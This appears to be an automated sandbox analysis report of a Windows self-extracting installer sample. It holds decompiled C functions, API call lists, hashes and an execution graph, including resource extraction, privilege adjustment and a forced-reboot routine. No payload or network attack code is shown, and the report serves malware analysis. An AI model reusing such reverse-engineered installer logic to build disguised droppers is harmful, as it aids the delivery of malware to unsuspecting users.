                                                                                                                                                                                                                                            0x008d4865
                                                                                                                                                                                                                                            0x008d486a
                                                                                                                                                                                                                                            0x008d486f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d4876
                                                                                                                                                                                                                                            0x008d4831
                                                                                                                                                                                                                                            0x008d4841
                                                                                                                                                                                                                                            0x008d4847
                                                                                                                                                                                                                                            0x008d480b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d480b
                                                                                                                                                                                                                                            0x008d47f6
                                                                                                                                                                                                                                            0x008d4806
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,008D4E6F), ref: 008D47EA
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 008D4823
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 008D4847
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008D4518
                                                                                                                                                                                                                                              • Part of subcall function 008D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 008D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008D4851
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 359063898-305352358
                                                                                                                                                                                                                                            • Opcode ID: 15b94904289b4bbeae00836d133c8119deddfd131965818ebb5d9efcf80cfaca
                                                                                                                                                                                                                                            • Instruction ID: 5f5f3b89a3ca210d7b84ef826c92cebd902600cc85205251955c05b217add19e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b94904289b4bbeae00836d133c8119deddfd131965818ebb5d9efcf80cfaca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC112975605642AFDB188F28EC18F723B6AFB85350B14872BF982D7341DA35CC068760
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D3680(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct tagMSG _v36;
                                                                                                                                                                                                                                            				int _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v8 = __ecx;
                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x008d368c
                                                                                                                                                                                                                                            0x008d368f
                                                                                                                                                                                                                                            0x008d3691
                                                                                                                                                                                                                                            0x008d369f
                                                                                                                                                                                                                                            0x008d36a7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d36ba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d36bc
                                                                                                                                                                                                                                            0x008d36bc
                                                                                                                                                                                                                                            0x008d36c0
                                                                                                                                                                                                                                            0x008d36cb
                                                                                                                                                                                                                                            0x008d36c2
                                                                                                                                                                                                                                            0x008d36c4
                                                                                                                                                                                                                                            0x008d36c4
                                                                                                                                                                                                                                            0x008d36da
                                                                                                                                                                                                                                            0x008d36e0
                                                                                                                                                                                                                                            0x008d36e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d36e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d36ba
                                                                                                                                                                                                                                            0x008d36ed

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008D369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 008D36CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008D36DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 262da3bee696c52551278d0b6bdb532134e9f6e0e9ac26c2bba2c2f5257b6654
                                                                                                                                                                                                                                            • Instruction ID: ce3c0d14986d2b1040fda5d46643f61ee5c4170928d59e2b712bfc24929e828f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 262da3bee696c52551278d0b6bdb532134e9f6e0e9ac26c2bba2c2f5257b6654
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3101A77290121477DF305BA66C48EEB7B7CFBD6B10F10031BF915E2280D560C640D671
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E008D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0x8d9a3c; // 0x8d0000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E008D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            0x008d651f
                                                                                                                                                                                                                                            0x008d652a
                                                                                                                                                                                                                                            0x008d6534
                                                                                                                                                                                                                                            0x008d656b
                                                                                                                                                                                                                                            0x008d6577
                                                                                                                                                                                                                                            0x008d657c
                                                                                                                                                                                                                                            0x008d6536
                                                                                                                                                                                                                                            0x008d653e
                                                                                                                                                                                                                                            0x008d6542
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6544
                                                                                                                                                                                                                                            0x008d6547
                                                                                                                                                                                                                                            0x008d654c
                                                                                                                                                                                                                                            0x008d6549
                                                                                                                                                                                                                                            0x008d6549
                                                                                                                                                                                                                                            0x008d6549
                                                                                                                                                                                                                                            0x008d655e
                                                                                                                                                                                                                                            0x008d6560
                                                                                                                                                                                                                                            0x008d6569
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6569
                                                                                                                                                                                                                                            0x008d6542
                                                                                                                                                                                                                                            0x008d6587

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(008D0000,000007D6,00000005), ref: 008D652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(008D0000,00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 008D6538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(008D0000,00000000,00000547,008D19E0,00000000), ref: 008D6557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,008D2EE8,00000000,008D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 008D6560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 8e68f6aecbc5b59d9103fe85748db8b128a530dac4e187fb552e2cf55ebbe905
                                                                                                                                                                                                                                            • Instruction ID: dea9e37b5a4438b84af801b4d31993953511f896bab8024420727fce19bda34e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e68f6aecbc5b59d9103fe85748db8b128a530dac4e187fb552e2cf55ebbe905
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5601F272101619BBCB105FA9AC08DBB7B7CFB85360F100327FE01D3250E7719D6086A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E008D65E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            0x008d65e8
                                                                                                                                                                                                                                            0x008d65ed
                                                                                                                                                                                                                                            0x008d65ef
                                                                                                                                                                                                                                            0x008d65f2
                                                                                                                                                                                                                                            0x008d65f4
                                                                                                                                                                                                                                            0x008d65f4
                                                                                                                                                                                                                                            0x008d65f6
                                                                                                                                                                                                                                            0x008d65f7
                                                                                                                                                                                                                                            0x008d6608
                                                                                                                                                                                                                                            0x008d6611
                                                                                                                                                                                                                                            0x008d6618
                                                                                                                                                                                                                                            0x008d661c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d660e
                                                                                                                                                                                                                                            0x008d6623
                                                                                                                                                                                                                                            0x008d6625
                                                                                                                                                                                                                                            0x008d663b
                                                                                                                                                                                                                                            0x008d663b
                                                                                                                                                                                                                                            0x008d663d
                                                                                                                                                                                                                                            0x008d6641
                                                                                                                                                                                                                                            0x008d6610
                                                                                                                                                                                                                                            0x008d6610
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d6610
                                                                                                                                                                                                                                            0x008d6644
                                                                                                                                                                                                                                            0x008d6647
                                                                                                                                                                                                                                            0x008d6647
                                                                                                                                                                                                                                            0x008d6621
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,008D2B33), ref: 008D6602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 008D6612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 008D6629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 008D6635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 884b1625b102f329b9426e1b823b737688282f441c70ad11587e0ecd96e0db11
                                                                                                                                                                                                                                            • Instruction ID: 22851963f0eb7afda5e0cdd487f03f8a3e6705fd5f0b0b1fb211bedb60914c8f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884b1625b102f329b9426e1b823b737688282f441c70ad11587e0ecd96e0db11
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56F02D310051546EDB361F28AC888BBBF9CFF97354B29036FE492C2201F6154D468661
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E008D69B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0x8d81f8 = E008D6C70();
                                                                                                                                                                                                                                            				__set_app_type(E008D6FBE(2));
                                                                                                                                                                                                                                            				 *0x8d88a4 =  *0x8d88a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0x8d88a8 =  *0x8d88a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0x8d8528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0x8d851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E008D7000();
                                                                                                                                                                                                                                            				if( *0x8d8000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E008D7000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E008D71EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x008d69b7
                                                                                                                                                                                                                                            0x008d69c2
                                                                                                                                                                                                                                            0x008d69c8
                                                                                                                                                                                                                                            0x008d69cf
                                                                                                                                                                                                                                            0x008d69d8
                                                                                                                                                                                                                                            0x008d69de
                                                                                                                                                                                                                                            0x008d69e4
                                                                                                                                                                                                                                            0x008d69e6
                                                                                                                                                                                                                                            0x008d69ec
                                                                                                                                                                                                                                            0x008d69f2
                                                                                                                                                                                                                                            0x008d69f4
                                                                                                                                                                                                                                            0x008d6a00
                                                                                                                                                                                                                                            0x008d6a07
                                                                                                                                                                                                                                            0x008d6a0d
                                                                                                                                                                                                                                            0x008d6a0e
                                                                                                                                                                                                                                            0x008d6a15

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 008D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 008D6FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 008D69C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 008D69D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 008D69E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 008D6A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: 3666fe17ae1c32bff1742379fc3df36c57d4eef66a9767289cc746ae968e1d87
                                                                                                                                                                                                                                            • Instruction ID: 6e0196109e0cea677b09008524031022656eb5335c95e7c827730abc7be60a7a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3666fe17ae1c32bff1742379fc3df36c57d4eef66a9767289cc746ae968e1d87
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9F0AC7054A705DFD758AB39FD0AA083B61FB04331B20471BE4A1C63F1DF7A8955CA12
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:28.7%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:962
                                                                                                                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                                                                                                                            execution_graph 2196 a04ca0 GlobalAlloc 2197 a06a60 2214 a07155 2197->2214 2199 a06a65 2200 a06a76 GetStartupInfoW 2199->2200 2201 a06a93 2200->2201 2202 a06aaf Sleep 2201->2202 2203 a06aa8 2201->2203 2202->2201 2204 a06ac7 _amsg_exit 2203->2204 2206 a06ad1 2203->2206 2204->2206 2205 a06b13 _initterm 2210 a06b2e __IsNonwritableInCurrentImage 2205->2210 2206->2205 2207 a06af4 2206->2207 2206->2210 2208 a06bd6 _ismbblead 2208->2210 2209 a06c1e 2209->2207 2211 a06c27 _cexit 2209->2211 2210->2208 2210->2209 2213 a06bbe exit 2210->2213 2219 a02bfb GetVersion 2210->2219 2211->2207 2213->2210 2215 a0717a 2214->2215 2216 a0717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2216 2215->2216 2217 a071e2 2215->2217 2218 a071cd 2216->2218 2217->2199 2218->2217 2220 a02c50 2219->2220 2221 a02c0f 2219->2221 2236 a02caa memset memset memset 2220->2236 2221->2220 2223 a02c13 GetModuleHandleW 2221->2223 2223->2220 2224 a02c22 GetProcAddress 2223->2224 2224->2220 2232 a02c34 2224->2232 2226 a02c8e 2227 a02c97 CloseHandle 2226->2227 2228 a02c9e 2226->2228 2227->2228 2228->2210 2232->2220 2234 a02c89 2330 a01f90 2234->2330 2347 a0468f FindResourceA SizeofResource 2236->2347 2239 a02ef3 2242 a044b9 20 API calls 2239->2242 2240 a02d2d CreateEventA SetEvent 2241 a0468f 7 API calls 2240->2241 2243 a02d57 2241->2243 2244 a02d6e 2242->2244 2245 a02d5b 2243->2245 2247 a02e1f 2243->2247 2250 a0468f 7 API calls 2243->2250 2352 a06ce0 2244->2352 2357 a044b9 2245->2357 2386 a05c9e 2247->2386 2253 a02d9f 2250->2253 2251 a02c62 2251->2226 2277 a02f1d 2251->2277 2253->2245 2256 a02da3 CreateMutexA 2253->2256 2254 a02e30 2254->2239 2255 a02e3a 2257 a02e52 FindResourceA 2255->2257 2258 a02e43 2255->2258 2256->2247 2259 a02dbd GetLastError 2256->2259 2260 a02e64 LoadResource 2257->2260 2261 a02e6e 2257->2261 2412 a02390 2258->2412 2259->2247 2263 a02dca 2259->2263 2260->2261 2266 a02e4d 2261->2266 2427 a036ee GetVersionExA 2261->2427 2264 a02dd5 2263->2264 2265 a02dea 2263->2265 2267 a044b9 20 API calls 2264->2267 2268 a044b9 20 API calls 2265->2268 2266->2244 2269 a02de8 2267->2269 2270 a02dff 2268->2270 2272 a02e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 a02f6c 2277->2278 2279 a02f3f 2277->2279 2571 a05164 2278->2571 2281 a02f5f 2279->2281 2552 a051e5 2279->2552 2699 a03a3f 2281->2699 2282 a02f71 2285 a0303c 2282->2285 2584 a055a0 2282->2584 2290 a06ce0 4 API calls 2285->2290 2292 a02c6b 2290->2292 2291 a02f86 GetSystemDirectoryA 2293 a0658a CharPrevA 2291->2293 2317 a052b6 2292->2317 2294 a02fab LoadLibraryA 2293->2294 2295 a02fc0 GetProcAddress 2294->2295 2296 a02ff7 FreeLibrary 2294->2296 2295->2296 2297 a02fd6 DecryptFileA 2295->2297 2298 a03006 2296->2298 2299 a03017 SetCurrentDirectoryA 2296->2299 2297->2296 2309 a02ff0 2297->2309 2298->2299 2632 a0621e GetWindowsDirectoryA 2298->2632 2300 a03054 2299->2300 2301 a03026 2299->2301 2305 a03061 2300->2305 2642 a03b26 2300->2642 2303 a044b9 20 API calls 2301->2303 2308 a03037 2303->2308 2305->2285 2307 a0307a 2305->2307 2651 a0256d 2305->2651 2313 a03098 2307->2313 2662 a03ba2 2307->2662 2718 a06285 GetLastError 2308->2718 2309->2296 2313->2285 2315 a030af 2313->2315 2720 a04169 2315->2720 2320 a052d6 2317->2320 2325 a05316 2317->2325 2318 a0538c 2321 a06ce0 4 API calls 2318->2321 2319 a05300 LocalFree LocalFree 2319->2320 2319->2325 2320->2319 2322 a052eb SetFileAttributesA DeleteFileA 2320->2322 2323 a02c72 2321->2323 2322->2319 2323->2226 2323->2234 2326 a0535e SetCurrentDirectoryA 2325->2326 2327 a065e8 4 API calls 2325->2327 2329 a05374 2325->2329 2328 a02390 13 API calls 2326->2328 2327->2326 2328->2329 2329->2318 3050 a01fe1 2329->3050 2331 a01f9f 2330->2331 2332 a01f9a 2330->2332 2336 a044b9 20 API calls 2331->2336 2337 a01fd9 2331->2337 2339 a01fc0 2331->2339 2333 a01ea7 15 API calls 2332->2333 2333->2331 2334 a01ee2 GetCurrentProcess OpenProcessToken 2340 a01f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2334->2340 2341 a01f0e 2334->2341 2335 a01fcf ExitWindowsEx 2335->2337 2336->2339 2337->2226 2339->2334 2339->2335 2339->2337 2340->2341 2342 a01f6b ExitWindowsEx 2340->2342 2344 a044b9 20 API calls 2341->2344 2342->2341 2343 a01f1f 2342->2343 2345 a06ce0 4 API calls 2343->2345 2344->2343 2346 a01f8c 2345->2346 2346->2226 2348 a046b6 2347->2348 2349 a02d1a 2347->2349 2348->2349 2350 a046be FindResourceA LoadResource LockResource 2348->2350 2349->2239 2349->2240 2350->2349 2351 a046df memcpy_s FreeResource 2350->2351 2351->2349 2353 a06ce8 2352->2353 2354 a06ceb 2352->2354 2353->2251 2469 a06cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 a06e26 2356->2251 2358 a0455a 2357->2358 2359 a044fe LoadStringA 2357->2359 2363 a06ce0 4 API calls 2358->2363 2360 a04562 2359->2360 2361 a04527 2359->2361 2366 a045c9 2360->2366 2372 a0457e 2360->2372 2362 a0681f 10 API calls 2361->2362 2364 a0452c 2362->2364 2365 a04689 2363->2365 2367 a04536 MessageBoxA 2364->2367 2482 a067c9 2364->2482 